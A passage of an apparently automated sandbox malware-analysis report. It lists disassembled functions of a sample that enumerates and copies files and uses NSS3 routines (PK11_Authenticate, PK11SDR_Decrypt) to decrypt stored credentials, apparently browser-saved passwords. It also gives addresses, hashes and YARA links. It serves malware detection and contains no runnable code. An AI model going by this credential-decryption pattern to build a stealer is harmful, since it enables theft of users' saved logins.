                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                          • String ID: : (malloc) Error initializing arena$<jemalloc>$lesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.
                                                                                                                                                                                          • API String ID: 2690322072-405358840
                                                                                                                                                                                          • Opcode ID: 3e40d274e844cef8634ddcb4fa4b67de23d2517d26ba08660b8123f717cdfb5e
                                                                                                                                                                                          • Instruction ID: d066f376d5f789adcefc6faed4d49df9d9517ff1c2999384ca89c7db841f9aa4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e40d274e844cef8634ddcb4fa4b67de23d2517d26ba08660b8123f717cdfb5e
                                                                                                                                                                                          • Instruction Fuzzy Hash: D191BE71A147618FD714CF2AC494E2AB7E1FBC9314F14992EE4AE87B80D730A845CB82
                                                                                                                                                                                          Function 0002CD37 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 298filestringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wsprintfA.USER32 ref: 0002CD5C
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 0002CD73
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,000574EC), ref: 0002CD94
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,000574F0), ref: 0002CDAE
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • lstrlenA.KERNEL32(0002D3B5,00056872,000574F4,?,0005686F), ref: 0002CE41
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,0005750C,00056873,?,00057508,00057504,00057500,000574FC), ref: 0002D122
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002D136
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 0002D23C
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 0002D250
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
                                                                                                                                                                                          • String ID: %s\*.*
                                                                                                                                                                                          • API String ID: 3967855609-1013718255
                                                                                                                                                                                          • Opcode ID: c99a95df98ae1fb65540f88547bba2b0c4f2b6fd8f5274eeda2ae79a4e5b88c8
                                                                                                                                                                                          • Instruction ID: 59f403706ad9ae291b44d7d0bb9182fedfaa6c9d27767df7210fa2c670d96865
                                                                                                                                                                                          • Opcode Fuzzy Hash: c99a95df98ae1fb65540f88547bba2b0c4f2b6fd8f5274eeda2ae79a4e5b88c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 99D1B03290252DABDF21EB64ED56ADD77B8AF44304F4141E1B908B7117DB30AF898F91
                                                                                                                                                                                          Function 6C4CAEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C5ECF46,?,6C4BCDBD,?,6C5EBF31,?,?,?,?,?,?,?), ref: 6C4CB039
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C5ECF46,?,6C4BCDBD,?,6C5EBF31), ref: 6C4CB090
                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,6C5ECF46,?,6C4BCDBD,?,6C5EBF31), ref: 6C4CB0A2
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,6C5ECF46,?,6C4BCDBD,?,6C5EBF31,?,?,?,?,?,?,?,?,?), ref: 6C4CB100
                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,00000002,?,6C5ECF46,?,6C4BCDBD,?,6C5EBF31,?,?,?,?,?,?,?), ref: 6C4CB115
                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,6C5ECF46,?,6C4BCDBD,?,6C5EBF31), ref: 6C4CB12D
                                                                                                                                                                                            • Part of subcall function 6C4B9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C4CC6FD,?,?,?,?,6C51F965,00000000), ref: 6C4B9F0E
                                                                                                                                                                                            • Part of subcall function 6C4B9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C51F965,00000000), ref: 6C4B9F5D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                                          • String ID: `dl
                                                                                                                                                                                          • API String ID: 3155957115-3736096424
                                                                                                                                                                                          • Opcode ID: 83716fc7ef44c7748c84d59640fdf68440a95ccc813653b0f20a34195b126da4
                                                                                                                                                                                          • Instruction ID: 1d43fd8f33f14742f3341c90268944f5f551932210a67c12f9cfb72a5abf2a4b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 83716fc7ef44c7748c84d59640fdf68440a95ccc813653b0f20a34195b126da4
                                                                                                                                                                                          • Instruction Fuzzy Hash: C691B0B8B046068FDB04CF25C884F6AB7B1FF46309F144A2DE41697B60EB31E855CB96
                                                                                                                                                                                          Function 6C560EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PK11_PubDeriveWithKDF.NSS3 ref: 6C560F8D
                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C560FB3
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C561006
                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C56101C
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C561033
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C56103F
                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C561048
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C56108E
                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C5610BB
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C5610D6
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C56112E
                                                                                                                                                                                            • Part of subcall function 6C561570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C5608C4,?,?), ref: 6C5615B8
                                                                                                                                                                                            • Part of subcall function 6C561570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C5608C4,?,?), ref: 6C5615C1
                                                                                                                                                                                            • Part of subcall function 6C561570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C56162E
                                                                                                                                                                                            • Part of subcall function 6C561570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C561637
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1510409361-0
                                                                                                                                                                                          • Opcode ID: 1a3a74019a7d6835cd98a0b1c23d02664e064d59da6aa0e56a85332af1f21f4a
                                                                                                                                                                                          • Instruction ID: 8ed9c658648f7d5f3a23dc7f7a340634aad0e68df7e716e3dd67c3649c2ee3c1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a3a74019a7d6835cd98a0b1c23d02664e064d59da6aa0e56a85332af1f21f4a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9271BFB1A04245DFDB04CFA6CD85A7BF7B0BF88328F148629E90997B21E731D944CB91
                                                                                                                                                                                          Function 6C586C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C531C6F,00000000,00000004,?,?), ref: 6C586C3F
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C531C6F,00000000,00000004,?,?), ref: 6C586C60
                                                                                                                                                                                          • PR_ExplodeTime.NSS3(00000000,6C531C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C531C6F,00000000,00000004,?,?), ref: 6C586C94
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                          • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                          • API String ID: 3534712800-180463219
                                                                                                                                                                                          • Opcode ID: 80568d760c32ccf8493be4b9675ef598372fc464ed9641ac9ea031c7a1180899
                                                                                                                                                                                          • Instruction ID: 5f99ccf0186bd656e3cf3873467130a1a5311068cdae892d92d80bb8bf24b9c1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 80568d760c32ccf8493be4b9675ef598372fc464ed9641ac9ea031c7a1180899
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE513A72B116594FC708CDADDC526DAB7DAABE4310F48C23AE842DB781DA38E906C751
                                                                                                                                                                                          Function 0002A7D8 Relevance: 15.1, APIs: 10, Instructions: 94stringencryptionCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002A815
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A830
                                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0002A838
                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A846
                                                                                                                                                                                          • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A85A
                                                                                                                                                                                          • PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A89A
                                                                                                                                                                                          • _memmove.LIBCMT ref: 0002A8BB
                                                                                                                                                                                          • lstrcatA.KERNEL32(00056803,00056807,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A8E5
                                                                                                                                                                                          • PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002A8EC
                                                                                                                                                                                          • lstrcatA.KERNEL32(00056803,0005680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A8FB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalString_memmove_memsetlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4058207798-0
                                                                                                                                                                                          • Opcode ID: e2cc49311ef446e9418931b21bd190db16a6ae9bf63f10330628b5a4a313c567
                                                                                                                                                                                          • Instruction ID: 6ecaf5a7e53f51a09cefaa0776df00dec3bdd442e8e77ecbafa40fea64441980
                                                                                                                                                                                          • Opcode Fuzzy Hash: e2cc49311ef446e9418931b21bd190db16a6ae9bf63f10330628b5a4a313c567
                                                                                                                                                                                          • Instruction Fuzzy Hash: DC314FB1D0012AAFDB109B64ED889FEB7BCAF09341F4400F6B50DE3141EB745A859F62
                                                                                                                                                                                          Function 0002B93F Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 319fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,\*.*,00056826,?,?,?), ref: 0002B99B
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,0005743C), ref: 0002B9BC
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057440), ref: 0002B9D6
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002BE0B
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002BE82
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 0002BEF1
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 0002BF05
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                          • API String ID: 2055012574-1173974218
                                                                                                                                                                                          • Opcode ID: c5cb177284b8c5e6f9c22291c2fdef64d6a8b91b3e88f68df6f63af122c8be01
                                                                                                                                                                                          • Instruction ID: c4464ff35788bdfb67613d05e093c30b7dc3d3ec4bb28d82a0c1971ed7e0ff43
                                                                                                                                                                                          • Opcode Fuzzy Hash: c5cb177284b8c5e6f9c22291c2fdef64d6a8b91b3e88f68df6f63af122c8be01
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43E1833194152DEBCF22EB64ED56ACEB778AF44305F4141E1A908B7126DB34AFC98F90
                                                                                                                                                                                          Function 6C648D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_CallOnce.NSS3(6C6914E4,6C5FCC70), ref: 6C648D47
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C648D98
                                                                                                                                                                                            • Part of subcall function 6C520F00: PR_GetPageSize.NSS3(6C520936,FFFFE8AE,?,6C4B16B7,00000000,?,6C520936,00000000,?,6C4B204A), ref: 6C520F1B
                                                                                                                                                                                            • Part of subcall function 6C520F00: PR_NewLogModule.NSS3(clock,6C520936,FFFFE8AE,?,6C4B16B7,00000000,?,6C520936,00000000,?,6C4B204A), ref: 6C520F25
                                                                                                                                                                                          • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C648E7B
                                                                                                                                                                                          • htons.WSOCK32(?), ref: 6C648EDB
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C648F99
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C64910A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
